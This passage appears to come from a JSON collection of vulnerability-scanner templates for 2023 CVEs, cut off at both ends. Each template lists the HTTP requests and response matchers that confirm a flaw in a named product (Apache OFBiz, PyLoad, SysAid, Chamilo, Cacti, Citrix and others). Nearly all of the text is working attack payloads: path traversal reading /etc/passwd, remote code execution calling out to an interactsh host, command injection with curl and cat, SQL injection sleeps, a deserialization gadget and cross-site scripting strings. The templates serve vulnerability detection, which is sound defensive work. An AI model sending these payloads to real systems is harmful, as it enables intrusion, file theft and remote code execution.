Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/js/../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","aiohttp"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-51467","info":{"name":"Apache OFBiz < 18.12.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-4113","info":{"name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Select Service(s)\", \"><script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34843","info":{"name":"Traggo Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/..%5c..%5c..%5c..%5cetc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-50968","info":{"name":"Apache OFBiz < 18.12.11 - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /partymgr/control/{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{parameter}}={\"http://{{interactsh-url}}/api\":\"{{str}}\"}\n"],"payloads":{"path":["getJSONuiLabel","getJSONuiLabelArray"],"parameter":["requiredLabel","requiredLabels"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-47246","info":{"name":"SysAid Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /userentry?accountId=/../../../tomcat/webapps/{{directory}}/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{ hex_decode('789c0bf06666e16200819c8abcf02241510f4e201b84851864189cc35c758d0c8c8c754dcc8d4cccf44a2a4a42433819981fdb05a79e63f34b2dade0666064f9cac8c0c0023201a83a3ec43538842bc09b91498e1997b1126071a026862d8d506d1896b0422c41b320c09b950da2979121024887824d02000d3f1fcb') }}\n","@timeout: 15\nGET /{{directory}}/CVE-2023-47246.txt?{{wait_for(9)}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2,'CVE_TEST') && status_code_1==200 && status_code_2==200"]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2822","info":{"name":"Ellucian Ethos Identity CAS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cas/logout?url=https://oast.pro\"><img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","Identity Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-35160","info":{"name":"XWiki >= 2.5-milestone-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)","{{BaseURL}}/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"javascript:alert(document.domain)\"","XWikiGuest"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24488","info":{"name":"Citrix Gateway and Citrix ADC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E","{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.domain)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<body x='&'onload=\"(alert)('citrix akamai bypass')\">","<script>alert(document.domain)</script>"],"condition":"or"},{"type":"word","part":"body","words":["Content-Type: text/html"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-43325","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-46359","info":{"name":"cPH2 Charging Station v1.87.0 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/connectioncheck.php?ip={{url_encode('127.0.0.1 && curl http://$(whoami).{{interactsh-url}}')}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>SUCCESS</b>","127.0.0.1 && curl http://$(whoami).{{interactsh-url}}"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-35162","info":{"name":"XWiki < 14.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"name=\\\"xcontinue\\\" value=\\\"javascript:alert(document.domain)\")","contains(body, \"previewactions.vm\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-33440","info":{"name":"Faculty Evaluation System v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=save_user HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------1037163726497\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"id\"\n\n1\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"firstname\"\n\nAdministrator\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"lastname\"\n\na\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"img\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-41599","info":{"name":"JFinalCMS v5.0.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/common/down/file?filekey=/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-30534","info":{"name":"Cacti < 1.2.25 Insecure Deserialization","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}\n","POST /managers.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}\n","GET /clog.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_4","regex":["<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","part":"body","group":1,"regex":["var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"],"internal":true}]}]},{"id":"CVE-2023-24044","info":{"name":"Plesk Obsidian <=18.0.49 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php"],"headers":{"Host":"oast.me"},"matchers-condition":"and","matchers":[{"type":"word","part":"location","words":["https://oast.me/login_up.php"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-39002","info":{"name":"OPNsense - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><svg/onload=alert(window.origin)> \"/>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-48084","info":{"name":"Nagios XI < 5.11.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","@timeout: 15s\nGET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_3>=5","contains(body_3, \"Home Dashboard</a>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true}]}]},{"id":"CVE-2023-3710","info":{"name":"Honeywell PM43 Printers - Command Injection","severity":"critical"},"requests":[{"raw":["POST /loadfile.lp?pageid=Configure HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)"]},{"type":"word","part":"body","words":["Release date"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38194","info":{"name":"SuperWebMailer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<img src=1 onerror=alert(document.domain) />\")","contains(tolower(body_1), \"superwebmailer\")","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type=\"ns2:Map\"><item><key xsi:type=\"xsd:string\">file_data</key><value xsi:type=\"xsd:string\"></value></item><item><key xsi:type=\"xsd:string\">file_name</key><value xsi:type=\"xsd:string\">`{}`.pptx'|\" |cat /etc/passwd||a #</value></item><item><key xsi:type=\"xsd:string\">service_ppt2lp_size</key><value xsi:type=\"xsd:string\">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"part":"body"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36144","info":{"name":"Intelbras Switch - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/exportCfgwithpasswd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System Description","System Version","System Name"],"condition":"and"},{"type":"word","part":"header","words":["attachment;filename="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-44393","info":{"name":"Piwigo - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>prompt(document.domain)</script>","The plugin has been successfully copied"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34756","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body_2, 'Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-22232","info":{"name":"Adobe Connect < 12.1.5 - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf"],"matchers-condition":"and","matchers":[{"type":"word","words":["Save to My Computer","exam.pdf","Click to Download"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-51449","info":{"name":"Gradio Hugging Face - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"files\";filename=\"okmijnuhbygv\"\nContent-Type: application/octet-stream\n\n{{str}}\n-----------------------------250033711231076532771336998311--\n","GET /file={{download_path}}{{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\\[\"(.+)okmijnuhbygv\"\\]"]}],"payloads":{"path":["..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","../../../../../../../../../../../../../../../etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3849","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find-a-matchpksyk\"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.cookie)>s9a64\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-37979","info":{"name":"Ninja Forms < 3.6.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=onerror=alert(document.domain)>\") && contains(body_2, \"import_form_template\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4415","info":{"name":"Ruijie RG-EW1200G Router Background - Login Bypass","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/sys/login"],"body":"{\n  \"username\":\"2\",\n  \"password\":\"admin\",\n  \"timestamp\":1695218596000\n}\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":\"ok\"","\"msg\":\"\u767b\u5165\u6210\u529f\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22432","info":{"name":"Web2py URL - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/default/index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npassword={{password}}&send=%5C%2F%5C%2Foast.pro&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["a href=\"\\/\\/oast.pro\""]},{"type":"word","part":"location","words":["\\/\\/oast.pro"]},{"type":"status","status":[303]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; 